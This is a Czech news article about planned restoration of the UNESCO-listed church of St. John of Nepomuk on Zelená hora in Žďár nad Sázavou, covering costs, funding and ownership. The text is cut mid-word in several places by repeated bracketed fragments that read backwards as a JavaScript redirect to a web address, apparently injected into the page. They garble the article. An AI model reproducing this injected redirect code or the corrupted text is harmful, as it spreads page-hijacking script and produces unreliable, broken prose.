Rainbow page separator

Kostel na Zelené hoře čekají úpravy exteriéru

Sobota, 4. dubna 2015

Zelená hora Žďár nad Sázavou, Santini, UNESCO

Žďár nad Sázavou / Sérií restaurá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torských úprav exteriéru by měla v příštích přibližně šesti letech projít památka zapsaná na seznamu svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového kulturního dědictví UNESCO – kostel svatého Jana Nepomuckého na Zelené hoře. Ty by mu měly navrátit jeho původní vzhled.
Revitalizace památky bude rozdělena do několika etap, přičemž nejzásadnější je úprava vnějšího vzhledu budovy, kde se počítá s opravou omítek a oken. Veškeré rekonstrukce by měly trvat zhruba do roku 2021 a vyžádají si asi padesát milionů korun. Na financování se bude podílet farnost, stát a měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, termín zahájení oprav dosud nebyl upřesněn.
Žďárská památka UNESCO v podobě poutního kostela svatého Jana Nepomuckého na Zelené hoře byla v rámci církevních restitucí oficiálně převedena do majetku církve loni v srpnu, kdy dohodu o vydání majetku podepsali zástupci Biskupství brněnského, Římskoka[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolické farnosti Žďár nad Sázavou 2, jež nyní památku spravuje, a Národního památkového ústavu, který se o sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostánek staral předtím.
Stát do areálu kostela svatého Jana Nepomuckého na Zelené hoře za období své správy inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval devadesát milionů korun, roční náklady na provoz podle památkářů činily zhruba milion, výnosy dva miliony korun. Ročně památku v průměru navštíví více než dvacet tisíc turistů.